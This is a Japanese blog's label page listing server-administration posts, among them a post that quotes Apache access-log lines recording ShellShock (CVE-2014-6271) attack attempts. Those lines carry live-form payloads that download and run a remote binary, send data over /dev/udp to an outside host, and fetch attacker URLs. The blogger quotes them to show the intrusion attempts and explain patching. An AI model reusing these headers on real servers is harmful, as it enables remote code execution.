ラベル サーバ管理 の投稿を表示しています。 すべての投稿を表示
ラベル サーバ管理 の投稿を表示しています。 すべての投稿を表示

macOS Sierraでbrew+php-build+mysql+apacheの環境を整える

OS X Mavericks (10.9) で開発環境を構築していたMacBookを、macOS Sierra (10.12) でクリーンインストールする必要に迫られた。

当時と比べ、PHPのバージョン管理はphpbrewなど乱立している感じだが、メンテされているものが少ない。

やはり、php-buildを使うことにした。

.
当時参考にしたのは以下の記事で、そのまま使えるものも多いため、今回もこれを参考に進めた。

PHPerがMacbookAirを買ったら直ぐにすること 2012
http://qiita.com/suin/items/26162a4ebcbbb351b879

さくらVPSがデータ不整合の障害で起動しなくなった件

さくらインターネットで借りていたVPS。
3月半ば、ハードウェアの不具合が認められたとかで、ハード交換のメンテナンスがなされたのだが、その作業完了後にデータの不整合で起動しない問題が起きた。(データが吹っ飛んだ)

エイプリルフールじゃないよ!

プランはSSDタイプで、同様の問題が起きていたことは、このVPSを契約する前からTwitter等で知っていたので、怖いなーとは思っていたのだが…。(そして、一年後の今)

VPSでINのトラフィックだけ急増した

契約しているVPSで、Incomingのトラフィックのみ異常に(1M bits/secも)伸びていたので、調べてみた。

VPS管理画面のトラフィック記録

CentOS6で、yumでphp5.3から5.5.28へアップデートする

2015/08 現在、CentOS 6 標準の yum でインストールされる PHP は 5.3.3 です。(いつまでこのままなのかな…)

remi のリポジトリを使って PHP 5.5 をインストールする方法は沢山書かれていますが、途中で躓いた箇所があったので備忘録として残しておきます。

さくらVPS石狩のSSD-2Gプラン(v3)でUnixBenchを取ってみた

さくらのVPSの石狩リージョン、SSDの2Gプラン (v3) の UnixBench を取ってみた。VPSは2台を試用して比較。

現在は東京リージョンに主軸は移っているような感じだが、石狩リージョンを利用している以前からのユーザも多いと思うので記録に残しておく。

SSDプランのUnixBench結果を探してみたところ、以下の記事しか見つからなかった。(多分このベンチは東京リージョン[v4]のプラン。「さくらのVPS(new SSD) #2CPU」と書かれている)

さくらのVPSがプランを全面リニューアルしたので、UnixBenchをConoHa,旧プランと比較してみた。 | レンタルサーバー・自宅サーバー設定・構築のヒント
http://server-setting.info/blog/sakura-vps-v4-vs-conoha.html

さくらのVPS SSD、東京と石狩でスペックや価格が違う

さくらのVPSのSSDプランが2014年11月にリニューアルされたが、東京リージョン(新バージョン)と石狩リージョン(旧バージョン)でスペックと価格に違いがあったので、自分用にまとめた。

「さくらのVPS」サービスをリニューアルいたしました(2014年11月27日掲載)

http://www.sakura.ad.jp/news/sakurainfo/newsentry.php?id=996

2015年1月現在さくらのVPSの料金詳細ページに書かれているのは東京リージョンの料金体系だけなので、リージョンを含めたプラン選びをするときは注意したい。

bash 脆弱性「ShellShock」の試行を示すHTTPアクセスログ

httpdのアクセスログを対象に以下のコマンドを実行してみると、結構ボロボロ出てきて怖い。
管理するサイトに来ている bash の脆弱性「ShellShock」にあたる攻撃の跡です。

ひとまず yum update bash で対処。mod_security も入れるべきかな。

grep '()' /var/log/httpd/access_log /var/log/httpd/ssl_access_log

ログの一部。
※外部URLを指定されているログは、リンクを防ぐために「http」を抜いています。

209.126.230.72 - - [25/Sep/2014:12:49:42 +0900] "GET / HTTP/1.0" 200 78 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)”
89.207.135.125 - - [25/Sep/2014:18:49:42 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138”
54.251.83.67 - - [28/Sep/2014:01:57:22 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
24.251.197.244 - - [25/Sep/2014:20:17:42 +0900] "GET / HTTP/1.1" 200 17487 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
166.78.61.142 - - [26/Sep/2014:00:54:52 +0900] "GET / HTTP/1.1" 200 17467 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444”
82.221.105.197 - - [29/Sep/2014:06:18:49 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"wget 82.221.105.197/bash-count.txt\""
93.103.21.231 - - [26/Sep/2014:08:40:00 +0900] "GET / HTTP/1.1" 200 17306 "-" "() { :;}; wget 'taxiairportpop.com/s.php?s=example.com/'"
62.210.75.170 - - [29/Sep/2014:18:23:46 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "() { :; }; wget creditstat.ru/ZmJzZWFyY2gubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget creditstat.ru/ZmJzZWFyY2gubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null”
94.102.60.177 - - [26/Sep/2014:22:59:10 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 214 "-" "() { x;};echo;echo 123456ololo | md5sum"
83.166.234.133 - - [27/Sep/2014:11:21:09 +0900] "GET / HTTP/1.0" 200 17553 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null ad.dipad.biz/test/example.com/\”"
70.42.149.72 - - [27/Sep/2014:11:58:11 +0900] "GET / HTTP/1.0" 200 78 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\”"
54.251.83.67 - - [28/Sep/2014:01:57:22 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a”
82.221.105.197 - - [29/Sep/2014:06:18:49 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"wget 82.221.105.197/bash-count.txt\""
8.37.217.197 - - [29/Sep/2014:18:42:37 +0900] "GET /search HTTP/1.1" 404 - "-" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.199 - - [29/Sep/2014:18:42:37 +0900] "GET /search HTTP/1.1" 404 - "-" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"

 
 
 
この辺りを参考にして対処。

bashの脆弱性(CVE-2014-6271) #ShellShock の関連リンクをまとめてみた

Apache SolrのDigest認証とポート変更、アクセスログを記録する

全文検索エンジンのApache Solr (Lucene)を運用する際に、Solrの管理ページやAPI(select, update等)をDigest認証で守る方法です。

SolrはWebサーバとして動作するので、どんな言語環境からでもHTTP通信するだけで利用できるのが良いところ。
反面、ローカル環境にでも置かない限り、どこからでも接続ができてしまいます。
通信内容まで暗号化するSSL+Basic認証にするのが一番堅牢だと思いますが、ひとまずログインだけでも安全にしたいという場合に。

試した環境

  • Solrのバージョンは4.7.1
  • CentOS 6.5

前提条件

  • Solrの起動までは出来ていること
  • Linuxサーバ構築等の基本的な知識はあることが望ましい

PAGE TOP